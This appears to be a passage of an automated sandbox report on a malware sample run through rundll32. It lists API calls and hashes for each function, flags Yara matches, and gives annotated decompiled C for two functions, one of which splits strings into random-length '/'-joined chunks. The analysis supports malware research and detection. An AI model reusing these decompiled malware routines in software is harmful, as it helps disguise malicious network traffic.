                          • Opcode ID: caadb6f63e326d1585d913fc1e69a9f5938a7f8640ccab45838db247d9bde560
                          • Instruction ID: 9186aee12246aa995e567f2b5f2a5d85dae55796115aef9acb80dcaf1b71d18f
                          • Opcode Fuzzy Hash: caadb6f63e326d1585d913fc1e69a9f5938a7f8640ccab45838db247d9bde560
                          • Instruction Fuzzy Hash: A141B031A0021AAFEF129F68DC84BEE77B4EF55310F004169F999972C0DB70EE548B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • ResetEvent.KERNEL32(?,00000000,00000000,00000000,05B63EC6,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 05B7C7D5
                          • GetLastError.KERNEL32(?,?,?,05B63EC6,?,?), ref: 05B7C7EE
                          • ResetEvent.KERNEL32(?,?,?,?,05B63EC6,?,?), ref: 05B7C867
                          • GetLastError.KERNEL32(?,?,?,05B63EC6,?,?), ref: 05B7C882
                            • Part of subcall function 05B7EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 05B7EC20
                            • Part of subcall function 05B7EC09: SetEvent.KERNEL32(?,?,?,?,05B63EC6,?,?), ref: 05B7EC30
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                          • String ID:
                          • API String ID: 1123145548-0
                          • Opcode ID: db254654ea140f772cd9abb01319530aeaa6f3f5c2e1972313f11712a013ea90
                          • Instruction ID: 33acf0b28c9b0c1d2da26b977ae89b1ed5c3515e9f261c4d2cd7ac664c0955c5
                          • Opcode Fuzzy Hash: db254654ea140f772cd9abb01319530aeaa6f3f5c2e1972313f11712a013ea90
                          • Instruction Fuzzy Hash: FF418732640608AFDB219BA4DC44EBE7BBAFF88260F1445A9E526D7190EB70FD41DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • StrRChrA.SHLWAPI(?,00000000,00000023,?), ref: 05B79A93
                          • StrChrA.SHLWAPI(?,0000005C), ref: 05B79ABA
                          • lstrcpyn.KERNEL32(00000005,?,00000001,00000001), ref: 05B79AE0
                          • lstrcpy.KERNEL32(?,?), ref: 05B79B84
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrcpyn
                          • String ID:
                          • API String ID: 4154805583-0
                          • Opcode ID: 995712dbd32c6e54c2fed520fc6bd36619fffff566ff46b32a726089619befed
                          • Instruction ID: 6c9a6cbb2b5ab8166a668746ba0c0f7565a756216714257900dc8425677cb40e
                          • Opcode Fuzzy Hash: 995712dbd32c6e54c2fed520fc6bd36619fffff566ff46b32a726089619befed
                          • Instruction Fuzzy Hash: 47411AB6910119BFDB12DBA4CD88DEE7BBDFB09250F0445A6F915E7140DA34AA48CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _strupr
                          • String ID:
                          • API String ID: 3408778250-0
                          • Opcode ID: e37ed19dce8e2714aef6bdc903c97eeb8f8e9d9f34bfac20a75129458cabd5af
                          • Instruction ID: e57130f23783318fd6b99e9bd5b2f958337de89e36f4e3b5c45f85d7e4faa80d
                          • Opcode Fuzzy Hash: e37ed19dce8e2714aef6bdc903c97eeb8f8e9d9f34bfac20a75129458cabd5af
                          • Instruction Fuzzy Hash: 0A412E7290020D9ADF25EF68D888AFEB7F9FF44240F119455F825D6120E734F459CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B69D46: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000), ref: 05B69D54
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B648C0
                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B64911
                            • Part of subcall function 05B6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 05B6F3DB
                            • Part of subcall function 05B6F39B: GetLastError.KERNEL32 ref: 05B6F3E5
                            • Part of subcall function 05B6F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 05B6F40A
                            • Part of subcall function 05B6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 05B6F42D
                            • Part of subcall function 05B6F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 05B6F455
                            • Part of subcall function 05B6F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 05B6F46A
                            • Part of subcall function 05B6F39B: SetEndOfFile.KERNEL32(00001000), ref: 05B6F477
                            • Part of subcall function 05B6F39B: CloseHandle.KERNEL32(00001000), ref: 05B6F48F
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 05B64946
                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 05B64956
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                          • String ID:
                          • API String ID: 4200334623-0
                          • Opcode ID: bbc24cd67998fc16c91c65b49059a1d2880ba2b0fff456c7c4c57e18fbc321a4
                          • Instruction ID: a00fb2c43428209cd80d531e7b8aa49eec667c0b0001b1c7e4f143037f8e8f3a
                          • Opcode Fuzzy Hash: bbc24cd67998fc16c91c65b49059a1d2880ba2b0fff456c7c4c57e18fbc321a4
                          • Instruction Fuzzy Hash: 8E311576610019BFDB109FA4DC89CBABBAEFB08250B1104A5F605E7150DB71BE54EBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 05B7EC20
                          • SetEvent.KERNEL32(?,?,?,?,05B63EC6,?,?), ref: 05B7EC30
                          • GetLastError.KERNEL32 ref: 05B7ECB9
                            • Part of subcall function 05B7F197: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,05B82F4B,0000EA60,?,?,?,05B7DD27,00000000,0000EA60,00000000), ref: 05B7F1B2
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          • GetLastError.KERNEL32(00000000), ref: 05B7ECEE
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                          • String ID:
                          • API String ID: 602384898-0
                          • Opcode ID: d6f56f2200c5649dbe16f57e58c741e18727bc25a326e8284e4c1802c35a1608
                          • Instruction ID: f2fed398d8a45ace722b150fd5e7a05ee467b68c4a4a4c54542e9e475bd9ac32
                          • Opcode Fuzzy Hash: d6f56f2200c5649dbe16f57e58c741e18727bc25a326e8284e4c1802c35a1608
                          • Instruction Fuzzy Hash: 6E31EBB590020DFFDB20DFB5C8859AEBBBDFF08204F1449EAE512A2250D631FA44DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B7A8C1
                          • memcpy.NTDLL(00000018,?,?), ref: 05B7A8EA
                          • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000BEC1,00000000,000000FF,00000008), ref: 05B7A929
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7A93C
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                          • String ID:
                          • API String ID: 2780211928-0
                          • Opcode ID: 2c307575b7257dd2cb6efb2889ba80880e1c687d61b7a8b019a64f09c19912ff
                          • Instruction ID: 180e6d0db3c365b43a072137dfb60f6e1b211ea8c4804952567ab63c6587e4f2
                          • Opcode Fuzzy Hash: 2c307575b7257dd2cb6efb2889ba80880e1c687d61b7a8b019a64f09c19912ff
                          • Instruction Fuzzy Hash: A3315C70200209AFDB209F24DC45EAE7FAAFF05720F104519F966D7290DB70F915DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • TlsGetValue.KERNEL32(?), ref: 05B74BC8
                          • SetEvent.KERNEL32(?), ref: 05B74C12
                          • TlsSetValue.KERNEL32(00000001), ref: 05B74C4C
                          • TlsSetValue.KERNEL32(00000000), ref: 05B74C68
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value$Event
                          • String ID:
                          • API String ID: 3803239005-0
                          • Opcode ID: b8e55cce427e5870e3778c2591f106ee5a73a2353734e78ca6531181de5d444f
                          • Instruction ID: 895e834e65c6fcb6e5b500a8db0a3d76e6b92d47381738bf72e51a9ff010bd78
                          • Opcode Fuzzy Hash: b8e55cce427e5870e3778c2591f106ee5a73a2353734e78ca6531181de5d444f
                          • Instruction Fuzzy Hash: 4B21AE31200348AFCF21AF68DD869AA7FA2FF41B22B605469F422CB1A0D771FC51DB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B7550A: memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,00000000,?,?,?,05B63EC6), ref: 05B75540
                            • Part of subcall function 05B7550A: memset.NTDLL ref: 05B755B6
                            • Part of subcall function 05B7550A: memset.NTDLL ref: 05B755CA
                          • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 05B7F0F5
                          • lstrcmpi.KERNEL32(00000000,?), ref: 05B7F11C
                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05B7F161
                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 05B7F172
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                          • String ID:
                          • API String ID: 1065503980-0
                          • Opcode ID: 7ddb4d744d19ad9bebca2d6033cc095266b4f5efce53ce2cfa40f2d2d4d37746
                          • Instruction ID: 5ec9655fe23a55875271c40779b911d19151fcab718b17d8188d70ad36233445
                          • Opcode Fuzzy Hash: 7ddb4d744d19ad9bebca2d6033cc095266b4f5efce53ce2cfa40f2d2d4d37746
                          • Instruction Fuzzy Hash: 27213931A10209BFDF21AFA4DC89EBE7BBAEB04254F1050A1F925A7150DB34B959DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memset.NTDLL ref: 05B7E0F3
                          • lstrlen.KERNEL32(00000000), ref: 05B7E104
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • strcpy.NTDLL ref: 05B7E11B
                          • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 05B7E125
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeaplstrlenmemsetstrcpy
                          • String ID:
                          • API String ID: 528014985-0
                          • Opcode ID: 6d6c2d33b07c48461acf782015b3acd54083e603f3799abe77abef85993115b6
                          • Instruction ID: 4cc41e708bdbe0199339539e0546c9bcb4980320969264d28d824746d7b01815
                          • Opcode Fuzzy Hash: 6d6c2d33b07c48461acf782015b3acd54083e603f3799abe77abef85993115b6
                          • Instruction Fuzzy Hash: E7216075104305AFEB209B74D84AB3A7BEDFF44712F108499F9669B681EF75E404C611
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E0100264F(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                          				/* __eax: COM interface pointer. On success *_a4 receives a heap copy of a
                          				   BSTR obtained from a second object and *_a8 its byte length (0 when the
                          				   string is empty). Returns an HRESULT. */
                          				intOrPtr _v8;        /* HRESULT */
                          				void* _v12;          /* object returned by vtable slot 9 (offset 0x24) */
                          				void* _v16;          /* BSTR returned by vtable slot 64 (offset 0x100) */
                          				intOrPtr _t26;
                          				intOrPtr* _t28;
                          				intOrPtr _t31;
                          				intOrPtr* _t32;
                          				void* _t39;
                          				int _t46;
                          				intOrPtr* _t47;
                          				int _t48;
                          
                          				_t47 = __eax;
                          				_push( &_v12);
                          				_push(__eax);
                          				_t39 = 0;
                          				_t46 = 0;
                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();   /* slot 9: (this, &object) */
                          				_v8 = _t26;
                          				if(_t26 < 0) {
                          					L13:
                          					return _v8;
                          				}
                          				if(_v12 == 0) {
                          					/* call succeeded but returned no object: wait 200 ms and retry once */
                          					Sleep(0xc8);
                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                          				}
                          				if(_v8 >= _t39) {                          /* SUCCEEDED(hr); _t39 is still 0 here */
                          					_t28 = _v12;
                          					if(_t28 != 0) {
                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);   /* slot 64: (this, &bstr) */
                          						_v8 = _t31;
                          						if(_t31 >= 0) {
                          							_t46 = lstrlenW(_v16);
                          							if(_t46 != 0) {
                          								_t46 = _t46 + 1;               /* include the terminating NUL */
                          								_t48 = _t46 + _t46;            /* byte size of the UTF-16 string */
                          								_t39 = E01006D63(_t48);        /* heap allocation, NULL on failure */
                          								if(_t39 == 0) {
                          									_v8 = 0x8007000e;          /* E_OUTOFMEMORY */
                          								} else {
                          									memcpy(_t39, _v16, _t48);
                          								}
                          								__imp__#6(_v16);               /* OLEAUT32 ordinal 6: SysFreeString */
                          							}
                          						}
                          						_t32 = _v12;
                          						 *((intOrPtr*)( *_t32 + 8))(_t32);   /* slot 2: IUnknown::Release */
                          					}
                          					 *_a4 = _t39;
                          					 *_a8 = _t46 + _t46;                    /* byte count of the copy, 0 if no string */
                          				}
                          				goto L13;
                          			}
                          Statement addresses: 0x0100265b, 0x0100265f, 0x01002660, 0x01002661, 0x01002663, 0x01002665, 0x01002668, 0x0100266d, 0x01002704, 0x0100270b, 0x0100270b, 0x01002676, 0x0100267d, 0x0100268d, 0x0100268d, 0x01002693, 0x01002695, 0x0100269a, 0x010026a3, 0x010026a9, 0x010026ae, 0x010026b9, 0x010026bd, 0x010026bf, 0x010026c0, 0x010026c9, 0x010026cd, 0x010026de, 0x010026cf, 0x010026d4, 0x010026d9, 0x010026e8, 0x010026e8, 0x010026bd, 0x010026ee, 0x010026f4, 0x010026f4, 0x010026fd, 0x01002702, 0x01002702, 0x00000000

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: FreeSleepStringlstrlenmemcpy
                          • String ID:
                          • API String ID: 1198164300-0
                          • Opcode ID: e44f7739435e353f2baeafd4139d9a15f2ce7822a46b5e68b3e067b0ce48b17f
                          • Instruction ID: ddbd01f660e03f49a870ef0782e4a577adcedf55084d91f7cdda65ca4cef6c9b
                          • Opcode Fuzzy Hash: e44f7739435e353f2baeafd4139d9a15f2ce7822a46b5e68b3e067b0ce48b17f
                          • Instruction Fuzzy Hash: BE21447590120AEFEB12DFA8C9889DEBBF5FF48214F1041A9E985E7250EB31DA44CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memset.NTDLL ref: 05B62FB3
                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 05B62FF7
                          • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 05B6303A
                          • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 05B6305D
                            • Part of subcall function 05B7B9E9: GetTickCount.KERNEL32 ref: 05B7B9F9
                            • Part of subcall function 05B7B9E9: CreateFileW.KERNEL32(05B70971,80000000,00000003,05B8A1E8,00000003,00000000,00000000,?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BA16
                            • Part of subcall function 05B7B9E9: GetFileSize.KERNEL32(05B70971,00000000,?,00000001,?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BA49
                            • Part of subcall function 05B7B9E9: CreateFileMappingA.KERNEL32(05B70971,05B8A1E8,00000002,00000000,00000000,05B70971), ref: 05B7BA5D
                            • Part of subcall function 05B7B9E9: lstrlen.KERNEL32(05B70971,?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BA79
                            • Part of subcall function 05B7B9E9: lstrcpy.KERNEL32(?,05B70971), ref: 05B7BA89
                            • Part of subcall function 05B7B9E9: HeapFree.KERNEL32(00000000,05B70971,?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BAA4
                            • Part of subcall function 05B7B9E9: CloseHandle.KERNEL32(05B70971,?,00000001,?,05B70971), ref: 05B7BAB6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                          • String ID:
                          • API String ID: 3239194699-0
                          • Opcode ID: 1f4b54b0595532fc01b6261a31eb3904af3a383dffc01e68aeff15bfa8ae4875
                          • Instruction ID: f30e734a939a30fedc461258a0ae2b85608b6a0adf4e64a425dcf6bece6820ad
                          • Opcode Fuzzy Hash: 1f4b54b0595532fc01b6261a31eb3904af3a383dffc01e68aeff15bfa8ae4875
                          • Instruction Fuzzy Hash: FA214831500208EADF21DF65DD48EEEBBB9FF44360F140565F925931A0E734A559CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B8297E
                          • RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B82999
                          • GetLastError.KERNEL32 ref: 05B82A07
                          • GetLastError.KERNEL32 ref: 05B82A16
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalErrorLastSection$EnterLeave
                          • String ID:
                          • API String ID: 2124651672-0
                          • Opcode ID: 981e90901837f612a3d01fa06699f6311cb101dbe80b499e8cd98fea28d03c11
                          • Instruction ID: be4025ca87f0a5a979c9b76747fc6b35f4d1a1db3f45e84daeed450cc11c26d1
                          • Opcode Fuzzy Hash: 981e90901837f612a3d01fa06699f6311cb101dbe80b499e8cd98fea28d03c11
                          • Instruction Fuzzy Hash: 7F213B36900609EFCB22DF94D945AAEBBB9FF48720F115199F816A3250CB34FA11DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B6A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05B67D5E), ref: 05B6A6BE
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 05B67D99
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,05B6C556,?), ref: 05B67DAB
                          • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,05B6C556,?), ref: 05B67DC3
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,05B6C556,?), ref: 05B67DDE
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleModuleNamePointerRead
                          • String ID:
                          • API String ID: 1352878660-0
                          • Opcode ID: fac35b3e6273676e6d8c06afb5362a3e9c4bbc47acff59835762aebf4d15bd43
                          • Instruction ID: c85a4f5f272ef1f3fffe58bf79716adafd062670973513ccedc9b71fbf93a0cd
                          • Opcode Fuzzy Hash: fac35b3e6273676e6d8c06afb5362a3e9c4bbc47acff59835762aebf4d15bd43
                          • Instruction Fuzzy Hash: E91160B1A01118BBDF21AE65CC8AEFF7E7DEF01658F104495F515E2090DB75AA40DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlenW.KERNEL32(?,00000000,76CC8250,76C869A0,?,?,?,05B666C0,?,00000000,?), ref: 05B81CAB
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,05B666C0,?,00000000,?), ref: 05B81CCD
                          • lstrcpyW.KERNEL32(00000000,?), ref: 05B81CF9
                          • lstrcatW.KERNEL32(00000000,?), ref: 05B81D0C
                            • Part of subcall function 05B6B83F: strstr.NTDLL ref: 05B6B917
                            • Part of subcall function 05B6B83F: strstr.NTDLL ref: 05B6B96A
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                          • String ID:
                          • API String ID: 3712611166-0
                          • Opcode ID: 98c588b605d6ee85253b2ca561e2d698b861986214093844eed56b70b9c94c0b
                          • Instruction ID: 92bc5ae6e1f64cd1f8f188c1bfd2de9996cc5ce448133c28a1f14864b82e8d22
                          • Opcode Fuzzy Hash: 98c588b605d6ee85253b2ca561e2d698b861986214093844eed56b70b9c94c0b
                          • Instruction Fuzzy Hash: EF115672501419BFCB10AFA4CC89DEE7FADEF09250B1054A4F9059B110EB34FA01CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(?,?), ref: 05B6A28B
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B6A2A2
                          • StrChrA.SHLWAPI(00000000,0000002E), ref: 05B6A2AB
                          • GetModuleHandleA.KERNEL32(00000000), ref: 05B6A2C9
                            • Part of subcall function 05B68C35: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 05B68D0D
                            • Part of subcall function 05B68C35: VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,05B860B0,0000001C,05B7BE61), ref: 05B68D28
                            • Part of subcall function 05B68C35: RtlEnterCriticalSection.NTDLL(05B8A400), ref: 05B68D4D
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                          • String ID:
                          • API String ID: 105881616-0
                          • Opcode ID: c98f522127a1f21c77b97feed3f25e0c7b0ebafe5ebd7f1315e869e6b3c5694f
                          • Instruction ID: 85819ea3827dd4687ac023a38d1e6c1d0426309e90ee28afda8f8a4d2bd03d95
                          • Opcode Fuzzy Hash: c98f522127a1f21c77b97feed3f25e0c7b0ebafe5ebd7f1315e869e6b3c5694f
                          • Instruction Fuzzy Hash: AE213A74A40309EFCF21DFA8C948AAEBBF9FF45300F108099E406A7650DB78E981CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05B81D62
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 05B81D86
                          • RegCloseKey.ADVAPI32(?), ref: 05B81DDE
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000), ref: 05B81DAF
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: QueryValue$AllocateCloseHeapOpen
                          • String ID:
                          • API String ID: 453107315-0
                          • Opcode ID: f463235065a8131b5585fc16b9c263ed5bdf380db4af3765d48e04ca32d3e4ed
                          • Instruction ID: 7ab360ff8fe3f4a74583f32cefa23807d3e48c5293f71191e245eba5bb8272ea
                          • Opcode Fuzzy Hash: f463235065a8131b5585fc16b9c263ed5bdf380db4af3765d48e04ca32d3e4ed
                          • Instruction Fuzzy Hash: 5921C4B590050CFFDF11EF99C8859EEBBBAEB48340B208496F802A7210E771AA51DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B7EAA8,00000000,?,00000000,05B6E842,00000000,05FBC310), ref: 05B62646
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B6265E
                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,05B7EAA8,00000000,?,00000000,05B6E842,00000000,05FBC310), ref: 05B626A2
                          • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 05B626C3
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memcpy$AllocateHeaplstrlen
                          • String ID:
                          • API String ID: 1819133394-0
                          • Opcode ID: 50483b35660ec83f90e03a504a49644e01363ba854712997332e432cd9709529
                          • Instruction ID: 785364400053f690e8187f5cd3c5b6cd5e3f1024dd7cf183d4e52049388c8b37
                          • Opcode Fuzzy Hash: 50483b35660ec83f90e03a504a49644e01363ba854712997332e432cd9709529
                          • Instruction Fuzzy Hash: BD112C76B00114BFD7108A69DC85D6EBFEEDB81260B144176F505D7140EB74BD04C7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E01004162(unsigned int __eax, void* __ecx) {
                          				/* __eax: NUL-terminated ASCII string. Returns a new heap string in which the
                          				   input is cut into chunks of pseudo-random length (8 to min(24, remaining) - 1
                          				   bytes) joined by '/'. Chunk lengths come from a 32-bit LCG whose state lives
                          				   in the global at 0x100a2f0. Returns NULL if the allocation fails. */
                          				void* _v8;
                          				void* _v12;
                          				signed int _t21;
                          				signed short _t23;
                          				char* _t27;
                          				void* _t29;
                          				void* _t30;
                          				unsigned int _t33;
                          				void* _t37;
                          				unsigned int _t38;
                          				void* _t41;
                          				void* _t42;
                          				int _t45;
                          				void* _t46;
                          
                          				_t42 = __eax;
